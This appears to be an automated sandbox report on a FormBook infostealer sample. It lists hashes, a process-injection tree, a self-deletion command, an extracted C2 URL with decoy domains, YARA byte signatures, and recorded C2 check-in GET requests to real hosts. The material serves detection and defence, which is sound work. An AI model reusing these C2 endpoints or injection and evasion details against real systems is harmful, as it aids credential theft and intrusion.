Loading ...

Play interactive tourEdit tour

Windows Analysis Report 2u2u8wnrrW.exe

Overview

General Information

Sample Name:2u2u8wnrrW.exe
Analysis ID:502325
MD5:51dcc89ed1035a6c2fc57ada8dcb4dc2
SHA1:0e59efbffdd8153c61f20a6039110474c50c20e9
SHA256:092be1f456b0c24d932d6c4e4c44cfd0c9abc6c0418bf1567e67826cb51aef14
Tags:exeFormbook
Infos:

Most interesting Screenshot:

Detection

FormBook
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Multi AV Scanner detection for submitted file
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
Tries to detect virtualization through RDTSC time measurements
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
PE file contains strange resources
Contains functionality to read the PEB
Checks if the current process is being debugged
Uses Microsoft's Enhanced Cryptographic Provider
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • 2u2u8wnrrW.exe (PID: 6996 cmdline: 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
    • 2u2u8wnrrW.exe (PID: 7164 cmdline: C:\Users\user\Desktop\2u2u8wnrrW.exe MD5: 51DCC89ED1035A6C2FC57ADA8DCB4DC2)
      • explorer.exe (PID: 3440 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • chkdsk.exe (PID: 6464 cmdline: C:\Windows\SysWOW64\chkdsk.exe MD5: 2D5A2497CB57C374B3AE3080FF9186FB)
          • cmd.exe (PID: 3324 cmdline: /c del 'C:\Users\user\Desktop\2u2u8wnrrW.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 2440 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
    00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
    • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
    • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
    • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
    • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
    • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
    • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
    • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
    • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
    • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
    • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
    00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
    • 0x16ae9:$sqlite3step: 68 34 1C 7B E1
    • 0x16bfc:$sqlite3step: 68 34 1C 7B E1
    • 0x16b18:$sqlite3text: 68 38 2A 90 C5
    • 0x16c3d:$sqlite3text: 68 38 2A 90 C5
    • 0x16b2b:$sqlite3blob: 68 53 D8 7F 8C
    • 0x16c53:$sqlite3blob: 68 53 D8 7F 8C
    0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpJoeSecurity_FormBookYara detected FormBookJoe Security
      0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmpFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
      • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
      Click to see the 24 entries

      Unpacked PEs

      SourceRuleDescriptionAuthorStrings
      3.2.2u2u8wnrrW.exe.400000.0.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
        3.2.2u2u8wnrrW.exe.400000.0.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
        • 0x7818:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x7bb2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
        • 0x138c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
        • 0x133b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
        • 0x139c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
        • 0x13b3f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
        • 0x85ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
        • 0x1262c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
        • 0x9342:$sequence_7: 66 89 0C 02 5B 8B E5 5D
        • 0x18db7:$sequence_8: 3C 54 74 04 3C 74 75 F4
        • 0x19e5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
        3.2.2u2u8wnrrW.exe.400000.0.unpackFormbookdetect Formbook in memoryJPCERT/CC Incident Response Group
        • 0x15ce9:$sqlite3step: 68 34 1C 7B E1
        • 0x15dfc:$sqlite3step: 68 34 1C 7B E1
        • 0x15d18:$sqlite3text: 68 38 2A 90 C5
        • 0x15e3d:$sqlite3text: 68 38 2A 90 C5
        • 0x15d2b:$sqlite3blob: 68 53 D8 7F 8C
        • 0x15e53:$sqlite3blob: 68 53 D8 7F 8C
        3.2.2u2u8wnrrW.exe.400000.0.raw.unpackJoeSecurity_FormBookYara detected FormBookJoe Security
          3.2.2u2u8wnrrW.exe.400000.0.raw.unpackFormbook_1autogenerated rule brought to you by yara-signatorFelix Bilstein - yara-signator at cocacoding dot com
          • 0x8618:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x89b2:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x146c5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x141b1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x147c7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1493f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0x93ca:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1342c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xa142:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x19bb7:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1ac5a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
          Click to see the 8 entries

          Sigma Overview

          No Sigma rule has matched

          Jbx Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.esyscoloradosprings.com/fqiq/"], "decoy": ["driventow.com", "ipatchwork.today", "bolder.equipment", "seal-brother.com", "mountlaketerraceapartments.com", "weeden.xyz", "sanlifalan.com", "athafood.com", "isshinn1.com", "creationslazzaroni.com", "eclecticrenaissancewoman.com", "satellitephonstore.com", "cotchildcare.com", "yamacorp.digital", "ff4cuno43.xyz", "quicksticks.community", "govindfinance.com", "farmersfirstseed.com", "megacinema.club", "tablescaperendezvous4two.com", "ecarehomes.com", "floaterslaser.com", "benisano.com", "saint444.com", "thedusi.com", "avafxtrade.online", "hanenosuke.com", "suntioil4u.com", "healthyweekendtips.com", "24000words.com", "ofbchina.net", "begukiu0.info", "wolmoda.com", "mask60.com", "4bellemaison.com", "mambacustomboats.com", "sedsn.com", "doggycc.com", "kangrungao.com", "pharmacistcharisma.com", "passiverewardssystems.com", "qywyfeo8.xyz", "shenjiclass.com", "rdoi.top", "lavishbynovell.com", "fleetton.com", "hillcresthomegroup.com", "hartfulcleaning.com", "srofkansas.com", "applebroog.industries", "phillytrainers.com", "dmc--llc.com", "sosoon.store", "daysyou.com", "controldatasa.com", "markarge.com", "hirayaawards.com", "clinicscluster.com", "sophiagunterman.art", "kirtansangeet.com", "residential.insure", "ribbonofficial.com", "qianhaijcc.com", "fytvankin.quest"]}
          Multi AV Scanner detection for submitted fileShow sources
          Source: 2u2u8wnrrW.exeVirustotal: Detection: 16%Perma Link
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.2u2u8wnrrW.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.44db660.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.2u2u8wnrrW.exe.4525680.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 00000003.00000002.442406412.00000000011E0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616029625.0000000000BA0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.427369160.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.615888915.0000000000AB0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.375104803.00000000043B9000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.441219803.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000003.00000002.442378887.00000000011B0000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 0000000B.00000002.616273617.0000000000EE0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000000.410373126.000000000F586000.00000040.00020000.sdmp, type: MEMORY
          Source: 3.2.2u2u8wnrrW.exe.400000.0.unpackAvira: Label: TR/Crypt.ZPACK.Gen
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0538387E GetEncryptedFileVersionExt,11_2_0538387E
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 11_2_0537A61C GetEncryptedFileVersionExt,11_2_0537A61C
          Source: 2u2u8wnrrW.exeStatic PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 2u2u8wnrrW.exeStatic PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
          Source: Binary string: chkdsk.pdbGCTL source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: chkdsk.pdb source: 2u2u8wnrrW.exe, 00000003.00000002.442464835.0000000001290000.00000040.00020000.sdmp
          Source: Binary string: wntdll.pdbUGP source: 2u2u8wnrrW.exe, 00000003.00000003.372062420.0000000000F70000.00000004.00000001.sdmp, chkdsk.exe, 0000000B.00000002.618379906.000000000543F000.00000040.00000001.sdmp
          Source: Binary string: wntdll.pdb source: 2u2u8wnrrW.exe, chkdsk.exe
          Source: C:\Users\user\Desktop\2u2u8wnrrW.exeCode function: 4x nop then pop ebx3_2_00406AB9
          Source: C:\Windows\SysWOW64\chkdsk.exeCode function: 4x nop then pop ebx11_2_00AB6AB9

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49813 -> 34.102.136.180:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49836 -> 8.212.24.67:80
          Source: TrafficSnort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          Source: TrafficSnort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          Source: TrafficSnort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.6:49837 -> 172.67.216.2:80
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 172.67.216.2 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.seal-brother.com
          Source: C:\Windows\explorer.exeDomain query: www.kangrungao.com
          Source: C:\Windows\explorer.exeDomain query: www.healthyweekendtips.com
          Source: C:\Windows\explorer.exeNetwork Connect: 35.186.238.101 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.esyscoloradosprings.com
          Source: C:\Windows\explorer.exeNetwork Connect: 108.167.135.122 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.govindfinance.com
          Source: C:\Windows\explorer.exeNetwork Connect: 59.106.13.53 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.driventow.com
          Source: C:\Windows\explorer.exeNetwork Connect: 8.212.24.67 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.satellitephonstore.com
          C2 URLs / IPs found in malware configurationShow sources
          Source: Malware configuration extractorURLs: www.esyscoloradosprings.com/fqiq/
          Source: Joe Sandbox ViewASN Name: CLOUDFLARENETUS CLOUDFLARENETUS
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=Sq1XZHSp0Fahcv5+gSE8w/MNMhRnHgbusC6/nQsgBpT+5tokIrb/ucxwlvTI4NNTcxne7QOgew==&eL3dh=5jNDd4kX HTTP/1.1Host: www.satellitephonstore.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=mnFbYCr8dRmDLyqklk1rPiA6Of2qOAThWl37YLVanslLOc89q6CMhoedr+7VG/dsSCitRF0szg== HTTP/1.1Host: www.seal-brother.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=WJEXqHgQjytEiPF7j6bk2V/X0M1eNxv0v3X6q4y0idXjxAWnze1B3elnUPttxbcH5sirVrhN7g==&eL3dh=5jNDd4kX HTTP/1.1Host: www.driventow.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=c0qy46zOQOLzkfDDWvLWas23i13YCpczqQNjq5UjgzOv0kTDSt1UXZZmGaHbw3hLRr1ARfuDRg== HTTP/1.1Host: www.kangrungao.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?M8sli0XH=nFNrhldUoBq3vLmHBw1UbSwwpktYb/50pHGi08ob/NjKnaohHgqGQwabDFtlKJiid6rvTcStxw==&eL3dh=5jNDd4kX HTTP/1.1Host: www.healthyweekendtips.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: GET /fqiq/?eL3dh=5jNDd4kX&M8sli0XH=KZhYdxsAX/C25xiOpksKfhNe7DL7yKRLCy2J/73TfqSfqYhWOiYMofna8M+9D3INxKq1ETGrvw== HTTP/1.1Host: www.esyscoloradosprings.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:38 GMTContent-Type: text/htmlContent-Length: 275ETag: "615c5dca-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenServer: openrestyDate: Wed, 13 Oct 2021 17:59:50 GMTContent-Type: text/htmlContent-Length: 275ETag: "615f9602-113"Via: 1.1 googleConnection: closeData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 68 6f 72 74 63 75 74 20 69 63 6f 6e 22 20 68 72 65 66 3d 22 64 61 74 61 3a 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 3b 2c 22 20 74 79 70 65 3d 22 69 6d 61 67 65 2f 78 2d 69 63 6f 6e 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 46 6f 72 62 69 64 64 65 6e 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 41 63 63 65 73 73 20 46 6f 72 62 69 64 64 65 6e 3c 2f 68 31 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta http-equiv="content-type" content="text/html;charset=utf-8"> <link rel="shortcut icon" href="data:image/x-icon;," type="image/x-icon"> <title>Forbidden</title></head><body><h1>Access Forbidden</h1></body></html>
          Source: global trafficHTTP traffic detected: HTTP/1.1 503 Service UnavailableContent-Type: text/html; charset=UTF-8Content-Length: 884Connection: closeP3P: CP="CAO PSA OUR"Expires: Thu, 01 Jan 1970 00:00:00 GMTCache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0Pragma: no-cacheData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 22 3e 0d 0a 3c 4d 45 54 41 20 48 54 54 50 2d 45 51 55 49 56 3d 22 50 52 41 47 4d 41 22 20 43 4f 4e 54 45 4e 54 3d 22 4e 4f 2d 43 41 43 48 45 22 3e 0d 0a 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0d 0a 3c 73 74 79 6c 65 3e 0d 0a 20 20 23 63 6f 6e 74 65 6e 74 20 7b 0d 0a 20 20 20 20 62 6f 72 64 65 72 3a 33 70 78 20 73 6f 6c 69 64 23 61 61 61 3b 0d 0a 20 20 20 20 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 66 66 66 3b 0d 0a 20 20 20 20 6d 61 72 67 69 6e 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 70 61 64 64 69 6e 67 3a 31 2e 35 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 66 61 6d 69 6c 79 3a 54 61 68 6f 6d 61 2c 48 65 6c 76 65 74 69 63 61 2c 41 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 65 6d 3b 0d 0a 20 20 7d 0d 0a 20 20 68 31 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 33 65 6d 3b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 62 6f 6c 64 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 20 20 62 20 7b 0d 0a 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 6e 6f 72 6d 61 6c 3b 0d 0a 20 20 20 20 63 6f 6c 6f 72 3a 23 31 39 36 33 39 30 3b 0d 0a 20 20 7d 0d 0a 3c 2f 73 74 79 6c 65 3e 0d 0a 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 23 65 37 65 38 65 39 22 3e 0d 0a 3c 64 69 76 20 69 64 3d 22 63 6f 6e 74 65 6e 74 22 3e 0d 0a 3c 68 31 3e 56 69 72 75 73 2f 53 70 79 77 61 72 65 20 44 6f 77 6e 6c 6f 61 64 20 42 6c 6f 63 6b 65 64 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 6f 77 6e 6c 6f 61 64 20 6f 66 20 74 68 65 20 76 69 72 75 73 2f 73 70 79 77 61 72 65 20 68 61 73 20 62 65 65 6e 20 62 6c 6f 63 6b 65 64 20 69 6e 20 61 63 63 6f 72 64 61 6e 63 65 20 77 69 74 68 20 63 6f 6d 70 61 6e 79 20 70 6f 6c 69 63 79 2e 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 79 6f 75 72 20 73 79 73 74 65 6d 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 69 66 20 79 6f 75 20 62 65 6c 69 65 76 65 20 74 68 69 73 20 69 73 20 69 6e 20 65 72 72 6f 72 2e 3c 2f 70 3e 0d 0a 3c 70 3e 3c 62 3e 46 69 6c 65 20 6e 61 6d 65 3a 3c 2f 62 3e 20 20 3c 2f 70 3e 0d 0a 3c 2f 64 69 76 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a Data Ascii: <html><head><title>Virus/Spyware Download Bloc
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://fontfabrik.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
          Source: explorer.exe, 00000005.00000000.375200182.000000000095C000.00000004.00000020.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3/J
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.carterandcone.coml
          Source: 2u2u8wnrrW.exe, 00000000.00000002.374665647.00000000033B1000.00000004.00000001.sdmpString found in binary or memory: http://www.collada.org/2005/11/COLLADASchema9Done
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/?
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers/frere-jones.html
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers8
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designers?
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fontbureau.com/designersG
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.fonts.com
          Source: 2u2u8wnrrW.exe, 00000000.00000002.376580741.00000000074C2000.00000004.00000001.sdmpString found in binary or memory: http://www.founder.com.cn/cn
